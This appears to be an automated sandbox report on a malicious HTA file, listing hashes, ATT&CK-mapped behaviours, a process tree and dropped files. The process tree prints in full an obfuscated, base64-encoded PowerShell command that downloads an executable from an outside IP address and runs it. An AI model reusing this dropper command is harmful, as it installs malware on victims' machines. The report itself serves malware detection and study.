4aa454e445cc37d965867da8c17b921cf031045b8ecb90dc1884522a794d32f4

General

Target

4aa454e445cc37d965867da8c17b921cf031045b8ecb90dc1884522a794d32f4.hta
Size

154KB
MD5

586dc2855cbce16da2db1a5840694321
SHA1

aa92aefd6a9f95dc8e38f4d3b406cf506df9335b
SHA256

4aa454e445cc37d965867da8c17b921cf031045b8ecb90dc1884522a794d32f4
SHA512

53685b59faf9cff6d5cc4d07d7cda09e384a412ce79c5fb11fd48d815005cc60bf56d944a0fde3c1c274e5565f2ff4385db6e2fa1461a3e7b8f0e446d4558779
SSDEEP

96:4owZw9d6yfaKPQEoXRUn+VO+ehLGOToQPU6ghhiXB3zn+/edxCUMIqh2SCw2QKSs:4LwSiolYyrk3DwQ

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow	pid	Process
16	1552	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

Processes:

powershell.exe

pid	Process
1552	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cvtres.exemshta.execmd.exepowershell.execsc.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid	Process
1552	powershell.exe
1552	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description	pid	Process
Token: SeDebugPrivilege	1552	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

mshta.execmd.exepowershell.execsc.exe

description	pid	Process	procid_target
PID 2140 wrote to memory of 4832	2140	mshta.exe	83
PID 2140 wrote to memory of 4832	2140	mshta.exe	83
PID 2140 wrote to memory of 4832	2140	mshta.exe	83
PID 4832 wrote to memory of 1552	4832	cmd.exe	85
PID 4832 wrote to memory of 1552	4832	cmd.exe	85
PID 4832 wrote to memory of 1552	4832	cmd.exe	85
PID 1552 wrote to memory of 2288	1552	powershell.exe	88
PID 1552 wrote to memory of 2288	1552	powershell.exe	88
PID 1552 wrote to memory of 2288	1552	powershell.exe	88
PID 2288 wrote to memory of 3040	2288	csc.exe	91
PID 2288 wrote to memory of 3040	2288	csc.exe	91
PID 2288 wrote to memory of 3040	2288	csc.exe	91

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\4aa454e445cc37d965867da8c17b921cf031045b8ecb90dc1884522a794d32f4.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2140
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c PoWeRSHeLl -EX BYPAsS -Nop -w 1 -c DEviCECReDeNTIAlDepLOymEnt ; iNvOKe-EXPrESSIOn($(inVOkE-ExpREsSION('[SYSTeM.teXT.eNCoDIng]'+[ChaR]58+[chaR]58+'uTf8.GeTstRing([systEm.CoNVert]'+[chAR]0X3a+[cHAR]0X3a+'fRomBAse64sTrInG('+[CHar]34+'JGtHICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJFcmRlRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEV2Y3FORkllTVpRLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc04sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFd3WkJZc25ULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR096R3NXcnhhLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNTlBBc0dxV3YpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhJdXFrUkJ1UE1aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpDdWpLTCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRrRzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjk1LjE5Ny80MjEvdW5jLmV4ZSIsIiRlblY6QVBQREFUQVx1bmMuZXhlIiwwLDApO1N0YVJULVNsZUVwKDMpO2lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdW5jLmV4ZSI='+[cHaR]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4832
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PoWeRSHeLl -EX BYPAsS -Nop -w 1 -c DEviCECReDeNTIAlDepLOymEnt ; iNvOKe-EXPrESSIOn($(inVOkE-ExpREsSION('[SYSTeM.teXT.eNCoDIng]'+[ChaR]58+[chaR]58+'uTf8.GeTstRing([systEm.CoNVert]'+[chAR]0X3a+[cHAR]0X3a+'fRomBAse64sTrInG('+[CHar]34+'JGtHICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJFcmRlRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEV2Y3FORkllTVpRLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc04sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFd3WkJZc25ULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR096R3NXcnhhLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNTlBBc0dxV3YpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhJdXFrUkJ1UE1aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpDdWpLTCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRrRzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjk1LjE5Ny80MjEvdW5jLmV4ZSIsIiRlblY6QVBQREFUQVx1bmMuZXhlIiwwLDApO1N0YVJULVNsZUVwKDMpO2lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdW5jLmV4ZSI='+[cHaR]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1552
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iempmmih\iempmmih.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2288
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAC9B.tmp" "c:\Users\Admin\AppData\Local\Temp\iempmmih\CSCEEECB3A45E74BF0BFE8365B67B4C382.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESAC9B.tmp

Filesize
1KB

MD5
0156954819dfa73d4a96455cd12bde7c

SHA1
863b5bdc4189fd711815d81fec63ac947486300e

SHA256
cc0b999c3938684572baa16bfd0112dfa4f3ef959b46d4a8af740635d6aef797

SHA512
a98bf7da02afa68e574ef2cc56d5a684b05474b7f81ea88c595dff57a58a7ad9813c55d1dbc736b97862caa99fa13dfd7abb05f4f8c1e35935b73eb39b038eb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ppkit201.q5o.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\iempmmih\iempmmih.dll

Filesize
3KB

MD5
cbe010e9308223bd8283b625eb58176e

SHA1
878c8bff381a411fcde079d5d14ed7502a0b5c20

SHA256
8d833f4fb11b2a18b296e801511f5cff9bcaca536b299c231dedf45bc2e50b46

SHA512
57c51fc37b47b36fcb1dab7019cb5eccd2ed78437ee4fb5992f253242f21cd83277f1d6e28c11f4dc1f59eb33c1775c2b18fc60f5c18d4771b4d686ac9efb7c5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iempmmih\CSCEEECB3A45E74BF0BFE8365B67B4C382.TMP

Filesize
652B

MD5
dc9bc00521853d5eddc7176e367c1aa1

SHA1
d1cc0915ea6217223e0a8b67a7331a974240d457

SHA256
7a50c944628f26620492379e3c431add5655765a92f95105e2897382036e0ec1

SHA512
9ddb0d746494df1c9fecfb4d431de81c85dfeec6fb740177f5d1ebe3b54fe495a911df288899e96c4a49ed32e67c3f3d3e6bc8ba65fef726fae4b752415e5944

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iempmmih\iempmmih.0.cs

Filesize
482B

MD5
fb855dde451137351eb67570a43b18f5

SHA1
3e66d1786f6644d488d7b8a97a3f429518199f5e

SHA256
ff934921644479cabd71a146f687a208c7924197a310f2bdd86fcea1dcb3570f

SHA512
40bd0be759b332b735af39b6c82e24d6b093cbca1d5bde975078cbd28ce0d2e3f8c03c0559a42b7f68d482487b3157719d963428359245aef11db4823a6691cf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iempmmih\iempmmih.cmdline

Filesize
369B

MD5
e84e16e96db061b1a0bffc145050a418

SHA1
dfa3026c7d94727b196c86a1a7189daa6cb1d70b

SHA256
734e18668de2e41f53965804a38f1f10d3daf67616d3cfb487877d80bb1e8128

SHA512
e536d5a693211fa05ea47316b046755c62ce67427e1ce0b37db14d3ac1b5ee9fc6309673525db14fb77f861345108eb7ff9c10886d3bd1e27f787996fc65b0da

Download Submit
memory/1552-18-0x00000000060D0000-0x00000000060EE000-memory.dmp

Filesize
120KB

Download
memory/1552-40-0x00000000076C0000-0x0000000007756000-memory.dmp

Filesize
600KB

Download
memory/1552-7-0x0000000005350000-0x00000000053B6000-memory.dmp

Filesize
408KB

Download
memory/1552-17-0x0000000005C70000-0x0000000005FC4000-memory.dmp

Filesize
3.3MB

Download
memory/1552-0-0x000000007117E000-0x000000007117F000-memory.dmp

Filesize
4KB

Download
memory/1552-19-0x0000000006120000-0x000000000616C000-memory.dmp

Filesize
304KB

Download
memory/1552-20-0x00000000070A0000-0x00000000070D2000-memory.dmp

Filesize
200KB

Download
memory/1552-23-0x000000006DB90000-0x000000006DEE4000-memory.dmp

Filesize
3.3MB

Download
memory/1552-22-0x0000000071170000-0x0000000071920000-memory.dmp

Filesize
7.7MB

Download
memory/1552-33-0x00000000066D0000-0x00000000066EE000-memory.dmp

Filesize
120KB

Download
memory/1552-21-0x000000006DA30000-0x000000006DA7C000-memory.dmp

Filesize
304KB

Download
memory/1552-34-0x0000000007390000-0x0000000007433000-memory.dmp

Filesize
652KB

Download
memory/1552-35-0x0000000071170000-0x0000000071920000-memory.dmp

Filesize
7.7MB

Download
memory/1552-38-0x0000000007440000-0x000000000745A000-memory.dmp

Filesize
104KB

Download
memory/1552-37-0x0000000007AC0000-0x000000000813A000-memory.dmp

Filesize
6.5MB

Download
memory/1552-36-0x0000000071170000-0x0000000071920000-memory.dmp

Filesize
7.7MB

Download
memory/1552-39-0x00000000074A0000-0x00000000074AA000-memory.dmp

Filesize
40KB

Download
memory/1552-6-0x0000000005230000-0x0000000005296000-memory.dmp

Filesize
408KB

Download
memory/1552-41-0x0000000007620000-0x0000000007631000-memory.dmp

Filesize
68KB

Download
memory/1552-42-0x0000000007650000-0x000000000765E000-memory.dmp

Filesize
56KB

Download
memory/1552-43-0x0000000007660000-0x0000000007674000-memory.dmp

Filesize
80KB

Download
memory/1552-44-0x00000000076A0000-0x00000000076BA000-memory.dmp

Filesize
104KB

Download
memory/1552-45-0x0000000007690000-0x0000000007698000-memory.dmp

Filesize
32KB

Download
memory/1552-5-0x0000000005110000-0x0000000005132000-memory.dmp

Filesize
136KB

Download
memory/1552-4-0x0000000071170000-0x0000000071920000-memory.dmp

Filesize
7.7MB

Download
memory/1552-3-0x0000000071170000-0x0000000071920000-memory.dmp

Filesize
7.7MB

Download
memory/1552-2-0x00000000055D0000-0x0000000005BF8000-memory.dmp

Filesize
6.2MB

Download
memory/1552-1-0x0000000002AE0000-0x0000000002B16000-memory.dmp

Filesize
216KB

Download
memory/1552-58-0x0000000007690000-0x0000000007698000-memory.dmp

Filesize
32KB

Download
memory/1552-60-0x000000007117E000-0x000000007117F000-memory.dmp

Filesize
4KB

Download
memory/1552-61-0x0000000071170000-0x0000000071920000-memory.dmp

Filesize
7.7MB

Download
memory/1552-62-0x0000000071170000-0x0000000071920000-memory.dmp

Filesize
7.7MB

Download
memory/1552-63-0x0000000007930000-0x0000000007952000-memory.dmp

Filesize
136KB

Download
memory/1552-64-0x00000000086F0000-0x0000000008C94000-memory.dmp

Filesize
5.6MB

Download
memory/1552-67-0x0000000071170000-0x0000000071920000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads